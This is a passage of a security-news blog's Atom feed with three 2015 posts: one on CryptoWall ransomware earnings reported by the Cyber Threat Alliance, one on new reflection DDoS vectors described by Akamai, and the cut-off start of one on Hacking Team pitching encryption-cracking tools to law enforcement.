src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiS8VKiHJWQY8Z8Sma4DZWO5LC1n3AgZvJo4fI595yd2lIl37DQlh3Cd46Ix8kVsEwXcKanN2RzoWkHah1vA8NOrLuSmvfbvGO0hPHMHkV40N-ZbKSIaMhjMCr3GsotHt3J2H1TvaMsU0/s72-c/shutterstock_228162115-680x400.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3275619147523422902.post-5229355150844577462</id><published>2015-11-03T06:55:00.000-08:00</published><updated>2015-11-03T06:55:15.619-08:00</updated><title type='text'>Cryptowall ransomware creators earned a massive $325 million bitcoin ransom</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;h2 style=&quot;background-color: white; border: 0px; color: #19232d; font-family: Roboto, Arial, sans-serif; font-size: 21px; font-weight: normal; line-height: 1.5; margin: 0px 0px 24px; padding: 0px; vertical-align: baseline;&quot;&gt;
Cryptowall ransomware is minting millions in bitcoin for its developer&lt;/h2&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #0e0b0b; font-family: &#39;Roboto Condensed&#39;, Arial, sans-serif; font-size: 17px; line-height: 31.569px; margin-bottom: 1.857em; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span id=&quot;goog_1207010987&quot;&gt;&lt;/span&gt;&lt;span id=&quot;goog_1207010988&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #0e0b0b; font-family: &#39;Roboto Condensed&#39;, Arial, sans-serif; font-size: 17px; line-height: 31.569px; margin-bottom: 1.857em; padding: 0px; vertical-align: baseline;&quot;&gt;
Who says crime never pays, cryptowall is paying fantastic returns for its developers. According to a report by Cyber Threat Alliance,&amp;nbsp;the CryptoWall ransomware campaign has generated more than $325 million in ransom income for the malware developers.&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #0e0b0b; font-family: &#39;Roboto Condensed&#39;, Arial, sans-serif; font-size: 17px; line-height: 31.569px; margin-bottom: 1.857em; padding: 0px; vertical-align: baseline;&quot;&gt;
The report was published earlier this week by the Cyber Threat Alliance, founded by Intel Security, Symantec, Palo Alto Networks and Fortinet. The&amp;nbsp;&lt;a href=&quot;http://cyberthreatalliance.org/pr/pr-102915.html&quot; style=&quot;border: 0px; color: #487be4; font-family: inherit; margin: 0px; padding: 0px; text-decoration: none; transition: all 0.4s ease-in-out; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;report&lt;/a&gt;&amp;nbsp;states that Cryptowall has till now affected $325m worth of ransomware victim payments and made more than 400,000 attempts to infect computers with the third variant of CryptoWall (CW3), many of which appear to have focused on&amp;nbsp;targets in&amp;nbsp;North America.&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #0e0b0b; font-family: &#39;Roboto Condensed&#39;, Arial, sans-serif; font-size: 17px; line-height: 31.569px; margin-bottom: 1.857em; padding: 0px; vertical-align: baseline;&quot;&gt;
The report states that the ransomware originates from a single entity, evidence of which is available in both the code as well as the web of bitcoin payments trackable on the public blockchain. The report notes that Armenia, Belarus, Iran, Kazakhstan, Russia, Serbia and Ukraine are blacklisted, meaning the malware won’t operate in those regions and suggesting possible points of origin.&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #0e0b0b; font-family: &#39;Roboto Condensed&#39;, Arial, sans-serif; font-size: 17px; line-height: 31.569px; margin-bottom: 1.857em; padding: 0px; vertical-align: baseline;&quot;&gt;
The report’s authors add that an analysis of bitcoin transactions tied to known ransom campaigns points to the common use of bitcoin wallets across those campaigns, stating:&lt;/div&gt;
&lt;blockquote style=&quot;background: rgb(242, 242, 242); border-bottom-color: transparent; border-bottom-style: solid; border-left-color: rgb(217, 217, 217); border-left-style: solid; border-width: 0px 0px 1px 3px; color: #0e0b0b; font-family: &#39;Roboto Condensed&#39;, Arial, sans-serif; font-size: 17px; line-height: 31.569px; margin: 0px 0px 1.857em; padding: 1.857em 1.857em 0px; quotes: none; vertical-align: baseline;&quot;&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; margin-bottom: 1.857em; padding: 0px; vertical-align: baseline;&quot;&gt;
“As a result of examining this financial network, it was discovered that a number of primary wallets were shared between campaigns, further supporting the notion that all of the campaigns, regardless of the campaign ID, are being operated by the same entity.”&lt;/div&gt;
&lt;/blockquote&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #0e0b0b; font-family: &#39;Roboto Condensed&#39;, Arial, sans-serif; font-size: 17px; line-height: 31.569px; margin-bottom: 1.857em; padding: 0px; vertical-align: baseline;&quot;&gt;
The report states that the ransomware makers are quite flexible in their ransom bitcoin demands. The known ransom demand range from the hundreds to thousands of dollars, according to the report – are then washed through multiple addresses and known bitcoin services, though none are named directly in the report. Some of the funds are essentially reinvested in new exploit kits or rent payments for botnets.&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #0e0b0b; font-family: &#39;Roboto Condensed&#39;, Arial, sans-serif; font-size: 17px; line-height: 31.569px; margin-bottom: 1.857em; padding: 0px; vertical-align: baseline;&quot;&gt;
Revenue-wise, the report’s authors note that, for its backers, CryptoWall “is extremely successful and continues to provide significant income”.&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #0e0b0b; font-family: &#39;Roboto Condensed&#39;, Arial, sans-serif; font-size: 17px; line-height: 31.569px; margin-bottom: 1.857em; padding: 0px; vertical-align: baseline;&quot;&gt;
“One variant alone involved with the ‘crypt100’ campaign identifier resulted in over 15,000 victims across the globe,” the report states. “These 15,000 victims alone would account for, at minimum, roughly $5m in profit for the CW3 group.”&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #0e0b0b; font-family: &#39;Roboto Condensed&#39;, Arial, sans-serif; font-size: 17px; line-height: 31.569px; margin-bottom: 1.857em; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;em style=&quot;border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Read the full report below:&lt;/em&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #0e0b0b; font-family: &#39;Roboto Condensed&#39;, Arial, sans-serif; font-size: 17px; line-height: 31.569px; margin-bottom: 1.857em; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;https://www.scribd.com/doc/287932833/CryptoWall-Report&quot; style=&quot;border: 0px; color: #487be4; font-family: inherit; margin: 0px; padding: 0px; text-decoration: none; transition: all 0.4s ease-in-out; vertical-align: baseline;&quot; title=&quot;View CryptoWall Report on Scribd&quot;&gt;CryptoWall Report&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackers24x7.blogspot.com/feeds/5229355150844577462/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackers24x7.blogspot.com/2015/11/cryptowall-ransomware-creators-earned.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/5229355150844577462'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/5229355150844577462'/><link rel='alternate' type='text/html' href='http://hackers24x7.blogspot.com/2015/11/cryptowall-ransomware-creators-earned.html' title='Cryptowall ransomware creators earned a massive $325 million bitcoin ransom'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3275619147523422902.post-1878640056169712753</id><published>2015-11-01T09:24:00.002-08:00</published><updated>2015-11-01T09:25:53.957-08:00</updated><title type='text'>New Types of Reflection DDoS Attacks Spotted</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;background-color: white; border: 0px; font-stretch: inherit; margin: 0px; outline: none; padding: 0px; position: relative; vertical-align: baseline; word-wrap: break-word;&quot;&gt;
&lt;span style=&quot;color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 12px; letter-spacing: 0.293333px; line-height: 20px;&quot;&gt;A new threat advisory published this week by Akamai’s Security Intelligence Response Team warns organizations about three new types of reflection distributed denial-of-service (DDoS) attacks observed in recent months.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;background-color: white; clear: both; color: #222222; font-family: &#39;Open Sans&#39;, sans-serif; font-size: 14.6667px; letter-spacing: 0.293333px; line-height: 26.4px; margin: 0px; outline: none; padding: 0px; text-align: center; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqANmRdJOiObePOzscoi5iRL4vWx50KtRx_okwi49OZQJjnuG4mNrhacb9LDn_7gVYXE420yw_egU-a97L7SUSET7c0BfVCVmCfbLnS-1hYm4Tunn0zQWYzGNxdVpnER7inhNIoWvz7Nvi/s1600/2014_07_15-post-01.jpg&quot; imageanchor=&quot;1&quot; style=&quot;color: #2b5797; margin: 0px 1em; outline: none; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;241&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqANmRdJOiObePOzscoi5iRL4vWx50KtRx_okwi49OZQJjnuG4mNrhacb9LDn_7gVYXE420yw_egU-a97L7SUSET7c0BfVCVmCfbLnS-1hYm4Tunn0zQWYzGNxdVpnER7inhNIoWvz7Nvi/s400/2014_07_15-post-01.jpg&quot; style=&quot;border: 1px solid rgb(221, 221, 221); box-shadow: rgba(0, 0, 0, 0.0980392) 0px 1px 10px; height: auto; margin: 0px; max-width: 515px; outline: none; padding: 3px; vertical-align: baseline;&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-stretch: inherit; letter-spacing: 0.293333px; line-height: 20px; margin: 0px; outline: none; padding: 0px; position: relative; vertical-align: baseline; word-wrap: break-word;&quot;&gt;
&lt;strong style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; outline: none; padding: 0px; position: relative; vertical-align: baseline; word-wrap: break-word;&quot;&gt;&lt;span style=&quot;border: 0px; font-family: inherit; font-size: xx-small; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none; padding: 0px; position: relative; vertical-align: baseline; word-wrap: break-word;&quot;&gt;&lt;span style=&quot;border: 0px; font-family: &#39;trebuchet ms&#39;, geneva; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none; padding: 0px; position: relative; vertical-align: baseline; word-wrap: break-word;&quot;&gt;&lt;br style=&quot;position: relative; word-wrap: break-word;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-stretch: inherit; letter-spacing: 0.293333px; line-height: 20px; margin: 0px; outline: none; padding: 0px; position: relative; vertical-align: baseline; word-wrap: break-word;&quot;&gt;
&lt;strong style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; outline: none; padding: 0px; position: relative; vertical-align: baseline; word-wrap: break-word;&quot;&gt;&lt;span style=&quot;border: 0px; font-family: inherit; font-size: xx-small; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none; padding: 0px; position: relative; vertical-align: baseline; word-wrap: break-word;&quot;&gt;&lt;span style=&quot;border: 0px; font-family: &#39;trebuchet ms&#39;, geneva; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none; padding: 0px; position: relative; vertical-align: baseline; word-wrap: break-word;&quot;&gt;&lt;br style=&quot;position: relative; word-wrap: break-word;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; font-stretch: inherit; margin: 0px; outline: none; padding: 0px; position: relative; vertical-align: baseline; word-wrap: break-word;&quot;&gt;
&lt;span style=&quot;color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 12px; letter-spacing: 0.293333px; line-height: 20px;&quot;&gt;There are well over a dozen UDP protocols that can be abused for the reflection and amplification of DDoS attacks, including DNS, NTP, SSDP, BitTorrent, RIPv1, mDNS, CharGEN, QOTD, NetBIOS, and Portmap. While some of these services have been abused for a long time, others are not as popular among attackers.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 12px; letter-spacing: 0.293333px; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 12px; letter-spacing: 0.293333px; line-height: 20px;&quot;&gt;According to Akamai, attackers have recently started abusing the RPC portmap service, NetBIOS name servers, and Sentinel licensing servers.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 12px; letter-spacing: 0.293333px; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 12px; letter-spacing: 0.293333px; line-height: 20px;&quot;&gt;The content delivery network (CDN) service provider reported spotting attacks leveraging NetBIOS, a service used by applications on separate computers to communicate over a LAN, sporadically between March and July 2015. In the attacks observed by the company, the attackers obtained amplification rates ranging between 2.56 and 3.85. Of the four attacks seen by Akamai, the largest peaked at 15.7 Gbps.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 12px; letter-spacing: 0.293333px; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 12px; letter-spacing: 0.293333px; line-height: 20px;&quot;&gt;Another uncommon type of reflection attack spotted over the past period by the CDN company abused RPC Portmap (Portmapper), an Open Network Computing Remote Procedure Call (ONC RPC) service designed to map RPC service numbers to network port numbers.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 12px; letter-spacing: 0.293333px; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 12px; letter-spacing: 0.293333px; line-height: 20px;&quot;&gt;These types of attacks are much more powerful than the ones leveraging NetBIOS, with the largest attack exceeding 100 Gbps. While the most common amplification factor observed by Akamai was approximately 10, experts noticed one instance where the traffic sent to the targeted server was multiplied more than 50 times.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 12px; letter-spacing: 0.293333px; line-height: 20px;&quot;&gt;Akamai said it had observed such attacks almost every day in September. In August, when the company noticed the first RPC Portmap reflection attacks, telecoms firm Level 3 Communications also warned organizations about such threats.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 12px; letter-spacing: 0.293333px; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 12px; letter-spacing: 0.293333px; line-height: 20px;&quot;&gt;Another type of attack abuses Sentinel license servers, which are used to enforce and manage licensing in multi-user environments. The first such attack was observed by Akamai in June 2015 and it leveraged a vulnerable Sentinel server used by Stockholm University in Sweden. In September, Akamai mitigated a couple of Sentinel reflection DDoS attacks aimed at a gaming company and a financial firm, with a peak bandwidth of 11.7 Gbps detected for one of these attacks. DDoS protection company Nexusguard also warned about such attacks last month.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 12px; letter-spacing: 0.293333px; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 12px; letter-spacing: 0.293333px; line-height: 20px;&quot;&gt;While the amplification factor for such attacks can exceed 40, attackers are limited by the fact that there aren’t many Sentinel servers that can be abused. Only 745 unique sources of attack traffic have been identified, Akamai said in its report.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 12px; letter-spacing: 0.293333px; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 12px; letter-spacing: 0.293333px; line-height: 20px;&quot;&gt;&quot;Although reflection DDoS attacks are common, these three attack vectors abuse different services than we&#39;ve seen before, and as such they demonstrate that attackers are probing the Internet relentlessly to discover new resources to leverage,&quot; said Stuart Scholly, senior vice president and general manager at Akamai’s Security Business Unit. &quot;It looks like no UDP service is safe from abuse by DDoS attackers, so server admins need to shut down unnecessary services or protect them from malicious reflection. The sheer volume of UDP services open to the Internet for reflection DDoS attacks is staggering.&quot;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 12px; letter-spacing: 0.293333px; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 12px; letter-spacing: 0.293333px; line-height: 20px;&quot;&gt;Earlier this week, Symantec warned that attackers had started abusing MySQL servers infected with a piece of malware dubbed “Chikdos” for DDoS attacks.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackers24x7.blogspot.com/feeds/1878640056169712753/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackers24x7.blogspot.com/2015/11/new-types-of-reflection-ddos-attacks.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/1878640056169712753'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/1878640056169712753'/><link rel='alternate' type='text/html' href='http://hackers24x7.blogspot.com/2015/11/new-types-of-reflection-ddos-attacks.html' title='New Types of Reflection DDoS Attacks Spotted'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqANmRdJOiObePOzscoi5iRL4vWx50KtRx_okwi49OZQJjnuG4mNrhacb9LDn_7gVYXE420yw_egU-a97L7SUSET7c0BfVCVmCfbLnS-1hYm4Tunn0zQWYzGNxdVpnER7inhNIoWvz7Nvi/s72-c/2014_07_15-post-01.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3275619147523422902.post-4164113872553027723</id><published>2015-11-01T09:17:00.001-08:00</published><updated>2015-11-01T09:17:03.863-08:00</updated><title type='text'>Hacking Team Offering Encryption Cracking Tools to Law Enforcement Agencies</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;data&quot; style=&quot;background-color: white; border-top-color: rgb(221, 221, 221); border-top-style: solid; border-top-width: 1px; color: white; font-family: &#39;Segoe UI Light&#39;, &#39;Open Sans&#39;, Verdana, Arial, Helvetica, sans-serif; font-size: 17px; letter-spacing: 0.01em; margin: 0px; outline: none; padding: 3px; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;pagepost&quot; style=&quot;background-color: white; color: #312c21; float: left; font-family: &#39;Open Sans&#39;, sans-serif; font-size: 11pt; letter-spacing: 0.02em; line-height: 1.8; margin: 0px 0px 25px; outline: none; padding: 20px; vertical-align: baseline; width: 610px;&quot;&gt;
&lt;div class=&quot;cover&quot; style=&quot;color: #222222; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;div style=&quot;outline: none; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;/div&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;margin: 0px; outline: none; padding: 0px; vertical-align: baseline;&quot; trbidi=&quot;on&quot;&gt;
&lt;div id=&quot;aim15290401657040179827&quot; style=&quot;border: 0px; font-family: &#39;PT Sans&#39;, arial, sans-serif; font-size: 17px; font-stretch: inherit; line-height: 30px; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; margin: 0px; outline: none; padding: 0px; text-align: center; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzD-MEHFBri1lKMAlWrTixXYg26oU7MflxFLoy6YJFsxfIAexFQMtihb3xKUzbKh_St68f6OinS4JAb_yWG-UPAK4m_NjJiNZFGLGDHb-BuFS8TE5N38V7Pi8k1h_yuxtM5obu0OzDm-UM/s1600/hacking-team-tools.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; color: #2b5797; float: left; margin: 0px 1em 1em 0px; outline: none; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;332&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzD-MEHFBri1lKMAlWrTixXYg26oU7MflxFLoy6YJFsxfIAexFQMtihb3xKUzbKh_St68f6OinS4JAb_yWG-UPAK4m_NjJiNZFGLGDHb-BuFS8TE5N38V7Pi8k1h_yuxtM5obu0OzDm-UM/s640/hacking-team-tools.png&quot; style=&quot;border: 1px solid rgb(221, 221, 221); box-shadow: rgba(0, 0, 0, 0.0980392) 0px 1px 10px; height: auto; margin: 0px; max-width: 515px; outline: none; padding: 3px; vertical-align: baseline;&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
Hacking Team, the infamous Italy-based spyware company that had more than&amp;nbsp;&lt;a href=&quot;http://thehackernews.com/2015/07/Italian-hacking-team-software.html&quot; style=&quot;border: 0px; color: #3d5a99; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: bold; line-height: inherit; margin: 0px; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;400 GB of its confidential information&lt;/a&gt;&amp;nbsp;stolen earlier this year, has resumed its operations and started pitching new hacking tools to help US law enforcement gets around their&amp;nbsp;&lt;b style=&quot;background: transparent; border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;encryption issues&lt;/b&gt;.&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;br style=&quot;content: &amp;quot; &amp;quot;; display: block; margin: 20px 0px 0px; outline: 0px; padding: 0px;&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
Yes, Hacking Team is back with a new set of&amp;nbsp;&lt;b style=&quot;background: transparent; border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Encryption Cracking Tools&amp;nbsp;&lt;/b&gt;for government agencies as well as other customers to break encrypted communications.&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;/div&gt;
